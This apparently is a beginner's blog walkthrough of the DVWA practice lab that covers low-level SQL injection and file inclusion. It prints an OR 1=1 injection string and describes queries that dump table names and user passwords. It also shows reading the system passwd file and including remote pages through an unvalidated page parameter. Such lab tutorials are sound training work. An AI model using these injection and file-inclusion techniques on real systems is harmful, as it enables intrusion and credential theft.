After installing DVWA a couple weeks ago, it is futile if we do not make use of it. Just like what Anton Checkov said “Knowledge is of no value unless you put it into practice”. DVWA is one of the safest place for pentester to learn. Here in DVWA we could learn a lot such as reading and understanding the code and finding its vulnerability, trying to do brute force, command injection, and many more. In this post I will cover low level sql injection and low level file inclusion.
if you have not install the DVWA please refer to DVWA installation. Else, lets start.
First thing first, lets log in to the DVWA by typing localhost/login.php on the web url and this web page should appear on your screen.
You could login by inputing admin as the username and password as the password.
Next, we will get the first page of the website that will show several methods that we could use to exploit the vulnerability of the website.
On the left site, we could see the list of method that we could try. However, before that we need to set the level of security. DVWA provides several level to be tested from Low to impossible. Impossible means that it is impossible for us to exploit the DVWA during that level. To set the security level we can click the “DVWA Security” button on the left bottom. Below is the appearance of the webpage.
You can choose the level and click submit.
In this post, I will only two methods as I have mentioned before. Below is the list of the method covered along with the screen shoots.
- SQL Injection (low):
Below is how the first page of sql injection page looks like.
If we input the user id with 1′; it will show the error below.
So, what actually happen? we could see what happen behind it by clicking the view source button on the right bottom corner. below is the example of the source code after you click the view source button.
So, according to the source code we could know that the codes sends a select statement from the database with a certain user id.
If you have not know the syntax of Mariadb sql statement, please refer to SQL tutorial for a better understanding. It is crucial to know about the detail of SQL syntax and structure in order to be able to get some information using sql injection.
If you have study about it or have knowledge about it, lets continue. Since we know from the query we will send this command:
SELECT first_name, last_name FROM users WHERE user_id = ‘$id’;”
it means that we could modify this command. Below is all the example of the command that I tried.
SELECT first_name, last_name FROM users WHERE user_id = 1′ OR 1 = 1; #;” command will give:
As you can see I use # to comment the unneeded syntax above. Meaning that the command that I really execute is actually this command:
SELECT first_name, last_name FROM users WHERE user_id = 1′ OR 1 = 1;
Now using the same pattern and more knowledge we can modify the command as we want.
below is the command that I use to see the version of mariadb used.
Below is the command to see what user we are.
Below is the command to see all of the table name from the database.
This table name is very important because maybe there are tables that might give us some useful information such as users table. (assumption that in user table there are usernames and passwords stored in it)
Below is the command to see all the columns from table users
Below is the command to get first name and password separated by enter input (here the code is 0x0a). So, in order to exploit more using SQL Injection better we know about the structure of the database and know the syntax.
- File inclusion (low):
File inclusion allows an attacker to include a remote file. Below is the example of it.
As you can see the url has ?page=file1.php
If we see the source code below, we can conclude that there is no validation of whatever file that we input in the url so that the get method will give you anything if exists.
Below is the example of gaining the passwd file and include it on the web page
Below is the example of including google search on the web page.
This means that the file inclusion is not limited to only an existing file but it can also include another webpage inside it. Using this conclusion, it means that it does not rule out the possibility to execute php file by only changing the url.